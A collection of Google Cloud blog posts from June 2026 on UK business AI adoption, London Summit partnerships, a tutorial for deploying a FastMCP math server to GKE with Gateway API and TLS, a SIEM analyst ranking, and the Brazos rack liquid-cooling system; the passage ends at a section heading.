Cloud Blog

How growing UK midsize businesses are building in the AI era

Wed, 17 Jun 2026 08:00:00 +0000

The UK’s 5-million-plus small and midsize businesses and enterprises (SMBs) are the backbone of our economy. Today, we’re seeing these critical businesses begin to put AI to work, to operate more efficiently, move faster, and ultimately deliver better outcomes for their customers.

This shift is driven by tangible day-to-day results. According to recent research from Enterprise Nation published in partnership with Google, 71% of AI adopters surveyed in the UK say the technology helps them save time on routine tasks, and 64% report a direct boost in productivity. On top of this, AI-enabled productivity tools (like Google Workspace with Gemini) are delivering a 20% boost in productivity for SMBs, which effectively hands them back one full working day every single week.

At Google Cloud, we have a front row seat to this shift: SMBs have long utilized platforms like Google Workspace, and today they’re transforming with Google’s AI platform and models. In fact, we’ve seen the number of UK-based SMBs using Google Cloud AI nearly double year-over-year. This includes our Gemini models and products like Gemini Enterprise and AI Studio, which are helping SMBs do things like:

Roll out better customer support systems to help escalate and resolve customer support calls more quickly.
Automate repetitive actions in areas like payroll and accounting.
Help more employees understand and leverage data at work — even those not trained as data analysts.
Rapidly create and implement new designs for marketing collateral.
Help more people build their own AI agents to help them in their everyday jobs.
Conduct complex research projects at a speed and price point previously unavailable.

At today’s Google Cloud London Summit, we’re showcasing a number of innovative SMB customers who are actively using our AI tools to transform how they work, including companies who have recently expanded their work with us:

Neural Alpha, a sustainability fintech company, is using Gemini models to read unstructured environmental and corporate sustainability reports to automatically find and organize thousands of key facts, cutting months of slow, manual research down to a fraction of the time.
Sep 2, a digital security provider, uses Gemini Enterprise to deploy autonomous AI agents for 24/7 threat monitoring — accelerating incident detection and quickly neutralizing security threats for its customers.
Sunhouse, a strategic brand design agency, uses Gemini Enterprise to easily find archived design work stored on Google Drive, enabling its teams to spend less time hunting for files and more time growing its business with global brands.
Terrapinn, a global B2B events company, is transforming its operations by leveraging Gemini models, NotebookLM, Looker, and BigQuery to turn manual tasks into automated workflows, accelerating how its teams design, market, and deliver world-class conferences.
VoCoVo, a telecommunications provider, is integrating Google Cloud AI across its systems to turn isolated data into actionable intelligence and build autonomous workflows, streamlining routine operations so their team can focus on high-impact innovation.

Empowering Your Team: AI Upskilling Resources for Growing British Businesses

To help midsize teams maximize their impact and confidently navigate the modern AI landscape, we’ve developed a suite of dedicated, no-cost upskilling resources. Whether you want to train your existing teams or democratize data tools across your entire workforce, these programs will help you build an AI-ready organization:

SMB-Focused Programs: Explore our new SMB Learning Path or enroll in the Gemini Enterprise Agent Ready (GEAR) program for specialized training in agentic AI.
Google Skills for Organizations: Access our no-cost, on-demand learning platform featuring over 3,000 AI courses and hands-on labs created by experts at Google Cloud and Google DeepMind.
Get Certified: Ready to validate your team's expertise? This premium, cohort-based program offers instructor-led training, technical mentorship, and AI-infused skill badges designed to prepare your team for industry-recognized certifications.

By offering a full suite of SMB technology and training — from productivity in Workspace, to all our Ads services, and now powerful AI tools — Google is helping small and midsize firms thrive, no matter where the future takes us.

From AI potential to agentic reality: Driving the UK’s next chapter

Wed, 17 Jun 2026 08:00:00 +0000

The United Kingdom, and London in particular, continues to be one of the great hubs for AI development in Europe and the world. We’re home to Google DeepMind, of course, as well as significant AI unicorns — and Google Cloud customers — like Ineffable Intelligence, which is today announcing an important partnership with us.

A year ago, we joined you for the London Summit to showcase the vast potential of generative AI, including a major investment in upskilling the UK civil service. Today, as we welcome our partners once again to the historic vaults of Tobacco Dock, that potential has become an industrial-scale reality. In my conversations with leaders across both Whitehall and The City, the focus has moved from chatbots and media experiments to full-production execution. This is the moment of the agentic enterprise, where we shift from systems that simply chat with us to systems that can reason, plan, and execute multi-step workflows.

This transition is the cornerstone of the UK’s projected £400 billion economic boost from AI by 2030. At Google Cloud, we are the only provider offering the full integrated stack — custom silicon, frontier models, and planet-scale infrastructure — required to turn the Agentic Enterprise into a reality.

The new frontier of British enterprise and research

The banking sector is a key proving ground for this shift. And HSBC, one of the largest and most important financial institutions in the world, is showing the way. Today, we’re announcing a multi-year transformational partnership with HSBC to accelerate AI adoption across HSBC’s products and services globally. This new collaboration will further accelerate the shift towards AI-enabled ways of working across HSBC’s global operations.

HSBC will work with Google Cloud and Google DeepMind engineering teams to collaborate on new AI-powered tools and programmes, with access to Google’s latest agentic AI capabilities – including Gemini models and the Gemini Enterprise Agent Platform. The initial delivery focus on three areas: hyper‑personalised wealth management support, stronger financial crime risk management, and AI tools to enhance frontline/relationship manager client service

UK startups also continue to break new ground with technology, and AI in particular, as demonstrated by the work of frontier labs like Ineffable Intelligence. The company, which launched earlier this year, has chosen Google Cloud as its preferred cloud partner, utilizing Google’s full stack of AI-optimized hardware and tools to build and train Ineffable’s first generation of foundational models.

Led by David Silver, a former Google DeepMind researcher who was instrumental in the AlphaGo project, Ineffable Intelligence is taking a unique approach to AI development. The team are building systems that learn primarily through their own experience through reinforcement learning, instead of relying on the large-scale human-generated datasets behind language models. The ambition is to create a “superlearner” that develops knowledge through trial and error. This year, Ineffable Intelligence set a record for a European seed funding round of $1.1 billion, and now Ineffable Intelligence will support its training work by deploying one of the largest clusters of A5X, powered by the NVIDIA Vera Rubin NVL72 platform on Google Cloud, delivering massive computational scale.

To move from experimentation to true industrial production, businesses need more than just models; they need a roadmap. To help show them the way, we’re expanding our partnership with Deloitte, which will open a new AI Studio at its London campus. Developed in collaboration with Google Cloud, the studio will help British organisations move beyond AI experimentation to deploy autonomous, action-oriented AI systems at scale.

Deloitte is also committing to upskill 1,000 members of its UK AI and data workforce on Gemini Enterprise. This certification program will ensure that Deloitte’s AI and data engineers’ are equipped with the technical expertise to implement Google’s most advanced agentic architecture, providing UK clients with one of the largest pools of certified AI talent in the region.

Building a future-ready public sector

The blueprint for a modern digital government requires moving away from rigid legacy contracts toward agile, AI-driven public services. In collaboration with the Ministry of Housing, Communities and Local Government (MHCLG), the i.AI incubator, Google Deepmind, and Faculty, we are delivering tangible public sector reform and tools for reinvention that directly support the national goal to "get Britain building."

Agencies like MHCLG are already using a tool called Extract which was built using Google technology to help transform planning processes by reducing document processing times from two hours to just two minutes. Simultaneously, we are supporting trials of an AI planning tool — co-created with local planning authorities in Barnet, Dorset, and Camden — which aims to cut decision times for everyday applications by 50%. Furthermore, the Department for Transport (DfT) is utilizing Gemini to streamline public consultation analysis, a move projected to save £4 million annually.

Innovation on this scale also requires a secure, sovereign foundation. That is why Google Cloud is working to strengthen our UK data residency commitments, including measures like making Gemini 3.5 Flash, which features in-country AI processing, available by late June 2026 for sensitive sovereign use cases. We are giving British organizations the confidence to innovate within strict compliance boundaries.

To help keep businesses safe from the challenges posed by bad actors using AI and other digital threats, we also recently announced a comprehensive AI-powered cybersecurity platform — Google AI Threat Defense — which combines Wiz, Mandiant, Gemini & CodeMender to find, fix, and protect our customers from vulnerabilities.

Proven impact from the high street to public service

Autonomous agents are no longer a future prospect; they are delivering value across the UK economy today. Our work with THG Ingenuity, an ecommerce solutions provider, has delivered an 8x higher conversion rate via its AI Shopping Assistant. Starling is similarly empowering customers with "spending intelligence" tools for instant habit analysis around purchases and expenses. And Rightmove, has launched a beta version of an AI-powered conversational property search, built with Google’s Gemini models, enabling users to search for homes in their own words.

The breadth of this impact is visible across every sector: Kingfisher is pioneering retail-specific agentic applications; Openreach is driving field service optimization in telecommunications; andUnilever is using AI at scale across the entire value chain to drive growth and build desirable brands in the new era of consumer goods.

Meanwhile, VMO2 is streamlining complex data operations; Vodafone is executing a $1 billion partnership to redefine network performance; and WPP is integrating Gemini across creative workflows, whether that's generating high-fidelity campaign assets at speed and scale, powering AI agents, or training robotic camera operators.

Empowering the engine of growth for small to medium businesses and startups

The true measure of Britain’s AI success lies in its small and medium enterprises and startup ecosystem. Our AI Works research highlights a pivotal moment: AI has the potential to boost productivity for small and medium enterprises by 20% and unlock £198 billion in output for the UK economy. With 56% of smaller firms already seeking guidance, we have launched the AI Works for Britain upskilling initiative to ensure no business is left behind.

We also continue to foster the next generation of British unicorn startups through our ongoing partnership with Tech Nation at the London AI Hub. This sustained commitment ensures founders have the resources and community needed to scale, and this September, we will further this mission by hosting the Gemini Startup Forum: Cybersecurity in London to help startups build secure-by-design AI applications.

The Model Garden at Platform 37

Our belief in the UK’s potential is reflected in our physical footprint, too. We are continuing to invest in the UK's digital infrastructure to support growing demand: Our state-of-the-art data center in Waltham Cross launched in September 2025, a key part of our two-year, £5 billion investment to help power the UK's AI economy. And earlier this year, we opened our new office in London in Kings Cross, Platform 37, along with plans for The AI Exchange, a new public space dedicated to deepening understanding of AI.

Building on this momentum, we are excited to introduce The Model Garden at Platform 37, launching in the fourth quarter of 2026. This London-based hub is far more than a physical space; it serves as a strategic investment designed to fundamentally elevate how we engage with our most important customers. Blending the timeless aesthetics of a classic English garden with immersive, high-tech innovation — from living digital walls to a three-story atrium — The Model Garden acts as a physical marketplace for our best ideas.

The blueprint for the agentic enterprise

For UK businesses, civic leaders, and organizations to continue to lead in the AI moment, they must not only rethink the technology they use but also fundamental aspects of how we work. As we support thousands of organizations and millions of teams here and around the globe, we see three core strategies helping achieve success with AI:

Culture: We must reimagine our organizations for the future. True transformation means getting teams excited, enabled, and equipped to work with AI agents in completely new ways. It is about human-AI collaboration, not just automation.
Responsibility: We must build with safety and security in mind from day one. Protecting your users, your customers, and your brand is paramount. Our frontier models are built on a foundation of rigorous AI principles and secure-by-design infrastructure.
Sustainability: In an era of rising compute demands, we must scale in a way that is both financially viable and positive for our planet. At Google, we are committed to carbon-free energy 24/7, ensuring that the UK’s AI growth does not come at the cost of our climate goals.

Architecting the future together

Google Cloud is the primary partner for the UK’s agentic transition. We are moving beyond the hype of experimentation into the rigor of production. From the research labs of King's Cross to the diverse enterprises powering the high street, we are architecting a resilient, sovereign, and prosperous future for the United Kingdom.

Thank you to everyone who’s joining us in London — yesterday, today, and into the future. This year we’ve packaged up an exclusive on-demand experience, allowing you to stream the defining London Summit moments, available anywhere, anytime.

Build and Deploy a Remote MCP Server to GKE in 30 Minutes

Wed, 17 Jun 2026 00:00:00 +0000

Build and Deploy a Remote MCP Server to GKE in 30 Minutes

Integrating context from tools and data sources into LLMs can be challenging, which impacts the ease of development for AI agents. To address this challenge, Anthropic introduced the Model Context Protocol (MCP), which standardizes how applications provide context to these models. Developers often want to build an MCP server for their APIs to make them available to fellow developers, allowing them to use it as context in their own applications. Google Kubernetes Engine (GKE) provides a scalable, reliable, and secure environment to deploy these remote MCP servers.

This guide shows the straightforward process of setting up a secure remote MCP server on GKE.

MCP transports

The Model Context Protocol follows a client-server architecture. It initially only supported running the server locally using the stdio transport. The protocol has since evolved and now supports remote access transports, specifically Streamable HTTP.

With Streamable HTTP, the server operates as an independent process that can handle multiple client connections. This transport uses HTTP POST and GET requests. The server must provide a single HTTP endpoint path that supports both POST and GET methods, such as https://example.com/mcp. You can learn more about the different transports in the official documentation.

Benefits of running an MCP server on GKE

Running an MCP server remotely on GKE provides several architecture benefits:

Scalability: GKE Autopilot is built to handle highly variable traffic. Since MCP Servers are stateless, GKE can scale horizontally to handle spikes in demand efficiently.
Centralized access: Teams can share access to a centralized MCP server, allowing developers to connect from local machines, Agents or pipelines instead of running redundant local servers. Updates to the central server immediately benefit everyone.
Enhanced security: The Kubernetes Gateway API combined with SSL certificates provides an easy way to force secure, encrypted traffic. This allows only secure connections to the MCP server, preventing unauthorized access.

Prerequisites

Before starting, ensure the following tools are installed:

python 3.10 or higher
uv (for package and project management, see the installation documentation)
Google Cloud SDK (gcloud)
kubectl command-line tool

Installation

Prepare environment variables

code_block: <ListValue: [StructValue([('code', 'export PROJECT_ID=$(gcloud config get-value project)\r\nexport REGION=us-central1'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ef02760d0>)])]>

Create a folder, mcp-on-gke, to store the code for the server and deployment.

code_block: <ListValue: [StructValue([('code', 'mkdir mcp-on-gke && cd mcp-on-gke'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ef0276070>)])]>

Now configure the Google Cloud credentials and set the active project.

code_block: <ListValue: [StructValue([('code', 'gcloud auth login\r\ngcloud config set project $PROJECT_ID'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ef0276d00>)])]>

Initiate the GKE Autopilot cluster creation in the background. This process takes a few minutes, so starting it now allows the cluster to provision while you complete the rest of the setup. Make sure to use an Autopilot version that ensures Cost-Optimized Compute (CCOP) is enabled for fast autoscale.

code_block: <ListValue: [StructValue([('code', 'gcloud container clusters create-auto mcp-cluster \\\r\n --region $REGION \\\r\n --release-channel rapid \\\r\n --async'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee26d49a0>)])]>

Use uv to create a project, which will generate a pyproject.toml file.

code_block: <ListValue: [StructValue([('code', 'uv init'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee26d4400>)])]>

Next, create the additional files needed: server.py for the MCP server code, test_server.py for testing, and a Dockerfile for the container deployment.

Math MCP server

Large language models are excellent at non-deterministic tasks, such as generating text, summarizing ideas, and reasoning about concepts. However, they can be unreliable for deterministic tasks like math operations. To solve this, developers can create tools that provide valuable context. Using FastMCP, a framework for building MCP servers in Python, it is possible to create a simple math server with two tools: add and subtract.

First, add FastMCP as a dependency.

code_block: <ListValue: [StructValue([('code', 'uv add fastmcp\r\nuv add asyncio'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee26d4700>)])]>

Copy the following code into server.py to create the server.

code_block: <ListValue: [StructValue([('code', 'from fastmcp import FastMCP\r\nfrom starlette.requests import Request\r\nfrom starlette.responses import PlainTextResponse\r\nimport asyncio\r\nimport logging\r\n\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(format="[%(levelname)s]: %(message)s", level=logging.INFO)\r\n\r\nmcp_port=3000\r\n\r\n# Initialize the FastMCP server\r\nserver = FastMCP(\r\n "Math Server",\r\n)\r\n\r\n@server.tool()\r\ndef add(a: int, b: int) -> int:\r\n """Add two numbers together."""\r\n return a + b\r\n\r\n@server.tool()\r\ndef subtract(a: int, b: int) -> int:\r\n """Subtract the second number from the first."""\r\n return a - b\r\n\r\n@server.custom_route("/healthz", methods=["GET"])\r\nasync def health_check(request: Request) -> PlainTextResponse:\r\n """Simple health check endpoint that returns a 200 OK response"""\r\n return PlainTextResponse("OK")\r\n\r\nif __name__ == "__main__":\r\n logger.info(f" MCP server started on port {mcp_port}")\r\n # Could also use \'sse\' transport, host="0.0.0.0" required for Cloud Run.\r\n asyncio.run(\r\n server.run_async(\r\n transport="streamable-http", \r\n host="0.0.0.0",\r\n port=mcp_port\r\n )\r\n )'), ('language', 'lang-py'), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee26d4eb0>)])]>

This example uses the streamable-http transport, which is recommended for remote servers. The script encapsulates the logic needed to run a scalable MCP endpoint.

Testing the MCP server locally

Create the test_mcp_server.py script to connect to test the MCP Server. This will be useful to test the MCP server before deploying it to GKE.

code_block: <ListValue: [StructValue([('code', 'from fastmcp import Client, FastMCP\r\nimport asyncio\r\nimport logging\r\n\r\n# Connect to the remote MCP server\r\nclient = Client("https://localhost:3000/mcp")\r\n\r\nasync def test_remote_server():\r\n async with client:\r\n # Basic server interaction\r\n await client.ping()\r\n\r\n # List available operations\r\n tools = await client.list_tools()\r\n print(f"Available tools: {tools} \\n")\r\n\r\n # Execute add operation\r\n result = await client.call_tool("add", {"a": 5, "b": 3})\r\n print(f"Result of addition: {result} \\n")\r\n\r\n # Execute subtract operation\r\n result = await client.call_tool("subtract", {"a": 5, "b": 3})\r\n print(f"Result of subtraction: {result} \\n")\r\n\r\nif __name__ == "__main__":\r\n asyncio.run(test_remote_server())'), ('language', 'lang-py'), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee26d4b50>)])]>

Run the MCP server locally to test the connection:

code_block: <ListValue: [StructValue([('code', 'uv run server.py'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee26d4760>)])]>

Then execute the test script in a new terminal to verify the connection.

code_block: <ListValue: [StructValue([('code', 'uv run test_mcp_server.py'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee26d4f70>)])]>

The output should print available tools and the results of invocing the add and subtract tools confirming the MCP server is functional.

Building the container image

To speed up the deployment process, build the container image while the cluster is still creating.

First, prepare the Dockerfile:

code_block: <ListValue: [StructValue([('code', 'FROM python:3.10-slim\r\nCOPY --from=ghcr.io/astral-sh/uv:0.4.15 /uv /bin/uv\r\nWORKDIR /app\r\nCOPY pyproject.toml .\r\nCOPY server.py .\r\nRUN uv sync\r\nCMD ["uv", "run", "server.py"]'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3134e20>)])]>

Now, set up the Artifact Registry and build the container image.

Set up Artifact Registry

code_block: <ListValue: [StructValue([('code', 'gcloud artifacts repositories create mcp-repo \r\n--repository-format=docker \r\n--location=$REGION'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae36a0>)])]>

Build and push the image in parallel

code_block: <ListValue: [StructValue([('code', 'gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/mcp-repo/math-mcp-server:latest'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3a00>)])]>

Once the image build is complete, verify that the cluster is ready and retrieve the credentials. If the output of the cluster is not "RUNNING" wait for it to be ready.

code_block: <ListValue: [StructValue([('code', 'gcloud container clusters list\r\ngcloud container clusters get-credentials mcp-cluster --region $REGION'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3370>)])]>

Deploying to GKE with Gateway API and SSL

The next step involves deploying the server workloads and exposing them securely using the Kubernetes Gateway API rather than the legacy Ingress. This guarantees secure, encrypted traffic via SSL certificates.

Create a deployment.yaml file to define the Kubernetes Deployment and Service. Replace the placeholders with your actual project ID and region.

code_block: <ListValue: [StructValue([('code', 'apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n name: mcp-server\r\nspec:\r\n replicas: 2\r\n selector:\r\n matchLabels:\r\n app: mcp-server\r\n template:\r\n metadata:\r\n labels:\r\n app: mcp-server\r\n spec:\r\n containers:\r\n - name: mcp-server\r\n image: $REGION-docker.pkg.dev/$PROJECT_ID/mcp-repo/math-mcp-server:latest\r\n ports:\r\n - containerPort: 3000\r\n resources:\r\n requests:\r\n memory: "256Mi"\r\n cpu: "250m"\r\n limits:\r\n memory: "512Mi"\r\n cpu: "500m"\r\n livenessProbe:\r\n httpGet:\r\n path: /healthz\r\n port: 3000\r\n initialDelaySeconds: 15\r\n periodSeconds: 20\r\n readinessProbe:\r\n httpGet:\r\n path: /healthz\r\n port: 3000\r\n initialDelaySeconds: 5\r\n periodSeconds: 10\r\n---\r\napiVersion: v1\r\nkind: Service\r\nmetadata:\r\n name: mcp-service\r\nspec:\r\n selector:\r\n app: mcp-server\r\n ports:\r\n - port: 80\r\n targetPort: 3000'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3490>)])]>

Apply this configuration to the cluster:

code_block: <ListValue: [StructValue([('code', 'kubectl apply -f deployment.yaml'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3ac0>)])]>

Check the pods are up and running

code_block: <ListValue: [StructValue([('code', 'kubectl get pods'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3f10>)])]>

To ensure our remote MCP Server is accessible let's try to reach it with a port-forward.

code_block: <ListValue: [StructValue([('code', 'kubectl port-forward svc/mcp-service 8080:80'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3ca0>)])]>

Run the test script to verify the connection. make sure to edit the MCP Server URL in the test script to http://localhost:8080/mcp.

code_block: <ListValue: [StructValue([('code', 'uv run test_mcp_server.py'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3550>)])]>

Now let's secure the connection. To do so, we'll use a Google-managed SSL certificate and attach it to a Gateway API resource. First, reserve a static IP address for your load balancer:

code_block: <ListValue: [StructValue([('code', 'gcloud compute addresses create mcp-server-ip --global\r\nexport MCP_SERVER_IP=$(gcloud compute addresses describe mcp-server-ip --global --format="value(address)")\r\necho "Your IP: $MCP_SERVER_IP"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3d00>)])]>

Point your domain's DNS A record at $MCP_SERVER_IP. Example: mcp.yourdomain.com

Create a Google-Managed Certificate. Replace mcp.yourdomain.com with your actual domain.

code_block: <ListValue: [StructValue([('code', 'gcloud compute ssl-certificates create mcp-cert --domains mcp.yourdomain.com --global'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae3460>)])]>

Create a gateway.yaml file to provision the load balancer and configure Transport Layer Security (TLS) termination.

code_block: <ListValue: [StructValue([('code', '# Gateway: HTTPS load balancer with the managed certificate and static IP\r\napiVersion: gateway.networking.k8s.io/v1beta1\r\nkind: Gateway\r\nmetadata:\r\n name: mcp-gateway\r\nspec:\r\n gatewayClassName: gke-l7-global-external-managed\r\n listeners:\r\n - name: https\r\n protocol: HTTPS\r\n port: 443\r\n tls:\r\n mode: Terminate\r\n options:\r\n networking.gke.io/pre-shared-certs: mcp-cert\r\n addresses:\r\n - type: NamedAddress\r\n value: mcp-server-ip\r\n---\r\n# HTTPRoute: forward traffic to the MCP Server\r\napiVersion: gateway.networking.k8s.io/v1\r\nkind: HTTPRoute\r\nmetadata:\r\n name: mcp-route\r\nspec:\r\n parentRefs:\r\n - name: mcp-gateway\r\n hostnames:\r\n - "mcp.yourdomain.com"\r\n rules:\r\n - matches:\r\n - path:\r\n type: PathPrefix\r\n value: /mcp\r\n backendRefs:\r\n - name: mcp-service\r\n port: 80\r\n---\r\n# The GCPBackendPolicy is used to configure session affinity and other backend.\r\n# Since MCP Servers are stateful we enable session affinity. This ensures that\r\n# requests from the same client are sent to the same backend.\r\napiVersion: networking.gke.io/v1\r\nkind: GCPBackendPolicy\r\nmetadata:\r\n name: mcp-backend-policy\r\nspec:\r\n default:\r\n sessionAffinity:\r\n type: CLIENT_IP\r\n targetRef:\r\n group: ""\r\n kind: Service\r\n name: mcp-service\r\n---\r\n# The HealthCheckPolicy is used to configure custom health probes for the MCP Server.\r\napiVersion: networking.gke.io/v1\r\nkind: HealthCheckPolicy\r\nmetadata:\r\n name: mcp-health\r\n namespace: default\r\nspec:\r\n default:\r\n checkIntervalSec: 15\r\n timeoutSec: 5\r\n healthyThreshold: 1\r\n unhealthyThreshold: 2\r\n logConfig:\r\n enabled: false\r\n config:\r\n type: HTTP\r\n httpHealthCheck:\r\n port: 3000\r\n requestPath: /healthz\r\n targetRef:\r\n group: ""\r\n kind: Service\r\n name: mcp-service'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee2ae32b0>)])]>

Deploying this configuration creates the infrastructure required to route external traffic securely to the MCP server.

code_block: <ListValue: [StructValue([('code', 'kubectl apply -f gateway.yaml'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee25c37f0>)])]>

Wait a few minutes for the load balancer to become active and the certificate to provision. Developers can check the status using kubectl get gateway mcp-gateway.

Try to reach the remote MCP Server. Run the test script to verify the connection. make sure to edit the MCP Server URL in the test script to https://mcp.yourdomain.com/mcp.

code_block: <ListValue: [StructValue([('code', 'uv run test_mcp_server.py'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee25c3b20>)])]>

Cleanup

code_block: <ListValue: [StructValue([('code', 'kubectl delete -f deployment.yaml\r\nkubectl delete -f gateway.yaml\r\ngcloud compute addresses delete mcp-server-ip --global\r\ngcloud compute ssl-certificates delete mcp-cert --global\r\ngcloud artifacts repositories delete mcp-repo --location=$REGION\r\ngcloud container clusters delete mcp-cluster --region $REGION'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee25c33d0>)])]>

Deploying Model Context Protocol servers to Kubernetes enables new use cases for integrated agents and AI workflows. To dive deeper into these capabilities, explore the following resources:

Google named a Leader in IDC MarketScape SIEM 2026 Vendor Assessment

Tue, 16 Jun 2026 17:30:00 +0000

Security operations teams are under immense pressure to defend against adversaries who use AI to act with unprecedented speed, scale, and sophistication. To navigate these moments, secure mission-critical workloads, and build confident defense programs, organizations rely on modern security information and event management (SIEM) systems as the backbone of their security operations.

We are proud to announce that Google has been named a Leader in the 2026 IDC MarketScape for Worldwide SIEM Vendor Assessment (#US54126826, June 2026). We believe this recognition reflects our sustained investment and innovation in Google Security Operations, bringing together Mandiant's frontline expertise, comprehensive automation, and advanced AI agents to empower defenders.

According to the report, Google was recognized for several key strengths, including:

The Alert Triage and Investigation agent collects evidence, runs correlated searches, and produces a transparent verdict, reducing the security analyst workload. The additional agents announced at Google Cloud Next extend agentic workflows beyond triage into proactive hunting and rule generation.
Google designs the silicon, runs the infrastructure, develops the Gemini foundation models through DeepMind, and encodes its internal security expertise into agent evaluation loops. Vertical AI integration supports unit economics that would be difficult to achieve through third-party model APIs and gives Google tighter control over the iteration cycle that improves agent accuracy on security-specific tasks.
Curated detection content authored by Mandiant analysts is mapped to MITRE ATT&CK and refreshed on a regular cadence. Customers report that the higher-tier curated rule sets deliver useful detections out of the box.
Search performance over large data volumes is a consistently cited technical strength. The unified data lake, combined with all-time UDM search and multistage search with cross joins, allows analysts to query the full retention period without the performance degradation common on legacy on-premises platforms.

IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of technology and service suppliers in a given market.  The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market and business execution in the short-term. The Strategy score measures alignment of vendor strategies with customer requirements in a 3-5-year timeframe. Vendor market share is represented by the size of the circles. Vendor year-over-year growth rate relative to the given market is indicated by a plus, neutral or minus next to the vendor name.

Google Security Operations, powered by AI

Speed and accuracy are crucial in threat detection and incident response. Google continues to drive security operations innovation to help defenders work smarter, not harder. By deeply embedding Gemini in Google Security Operations, we enable analysts to perform complex natural language searches across vast amounts of security telemetry. We have also added agents such as the Triage and Investigation agent that enhance analyst productivity by accelerating event summarization, dynamically generating detection rules, and building automated response playbooks in seconds instead of hours.

“With Google Security Operations, we’re able to take in large volumes of telemetry, introduce AI into our workflows, and we saw a 97% reduction in alerts,” Daniel Peterpaul, VP, Information Security, Sunrun.

Unparalleled access to threat intelligence

A modern SIEM must go beyond data aggregation; it requires context. Google Threat Intelligence combines Mandiant's frontline expertise, the global reach of the VirusTotal community, and the unparalleled visibility of Google's services and devices into Google Security Operations.

Our applied threat intelligence capability enables security teams to spend less time on manual monitoring and more time contextualizing alerts for better decision-making. Through services like Mandiant Hunt, we integrate our proactive experts directly into Google Security Operations to help defenders search for undetected attacks and adversary tactics, techniques, and procedures (TTPs) before they escalate.

Ensuring operational resilience for global enterprises

Organizations around the globe are making significant leaps in both the technology they use and the way they think about security operations by partnering with Google. The ability to stitch together security telemetry and threat intelligence gives organizations visibility to full-service recovery and holistic security transformation.

“Our engineers in the SOC are working on high fidelity, true positives only. So, you've got a high fidelity true positive that's fired, and frankly, you want that alarm then to be enriched with as much contextual information as possible, that's the shift that Gemini in SecOps will allow us to get to. We want AI to work in service of our people, and then we want people to use their human brilliance, creativity, big picture problem-solving to think about attack paths and predicting them, and really making our environment a hard target,” Matt Rowe, chief security officer, Lloyds Banking Group.

Take the next step in advancing your cyber defenses

Organizations that seek to work with a globally capable security leader with strong threat intelligence capabilities and a holistic approach to security operations should consider Google. To learn more about our capabilities and why Google has been named a Leader, read a complimentary excerpt of the 2026 IDC MarketScape for Worldwide SIEM Vendor Assessment here.

Introducing Brazos: Bringing liquid cooling to air-cooled data centers

Tue, 16 Jun 2026 16:00:00 +0000

Next-generation artificial intelligence (AI) and high-performance computing (HPC) chips routinely exceed 1000 W Thermal Design Power (TDP). Simply put, standard air cooling cannot manage these extreme heat loads. The alternative — retrofitting entire data center facilities with chilled water loops — requires extensive amounts of capital and time. To solve this problem, Google developed Brazos, a rack-mounted, closed-loop liquid-to-air cooling system that lets you deploy high-density, liquid-cooled equipment inside existing air-cooled environments. Brazos is generally available, and our manufacturing suppliers are ready to engage the broader industry to market and produce the Google Brazos design.

Data center facility updates can take months. Brazos breaks with this by allowing simple, one-rack-at-a-time installations. By separating the internal-to-IT liquid loop from the facility water supply, Brazos delivers high-performance liquid cooling with the operational simplicity of standard air systems.

Figure 1: Brazos OCP ORV3 Sidecar Configuration showing three units providing cooling to an adjacent IT rack.

Brazos functions as a self-contained liquid ecosystem, capturing heat via liquid at the component level and rejecting it into the data center's hot aisle using high-efficiency liquid-to-air heat exchangers. This plug-and-play architecture can be rapidly installed in any legacy facility that has sufficient power and standard air handling.

Figure 2: Photograph of three Brazos modular units in a sidecar rack.

System design and technical specifications

Brazos is a modular system that includes three cooling units and integrated rack manifolds, all engineered for high reliability. Each modular chassis occupies 11 Open Units (OU) of rack height and interfaces with standard Open Compute Project (OCP) ORv3 form-factor racks. Key design and performance parameters include:

Rack thermal capacity: Supports a 60 kW nominal thermal load per rack across three modular units
Coolant compatibility: Runs using either deionized (DI) water or a 25% propylene glycol mixture (PG25)
Power delivery: Operates on a 40–60 V DC input designed to connect directly with standard rack busbars
Safety features: Certified to UL/CSA/IEC 62368-1 standards and features built-in leak detection alongside pressure relief valves
Control plane: Local monitoring uses a built-in human-machine interface (HMI), while remote management connects via Modbus over TCP

The mechanical design prioritizes field serviceability. The chassis sits on low-friction slides so it can easily be extended for rapid component access. Crucial components like pumps and fans are designed as hot-swappable, field-replaceable units (FRUs) to minimize mean time to repair (MTTR).

Rapid deployment and industry adoption

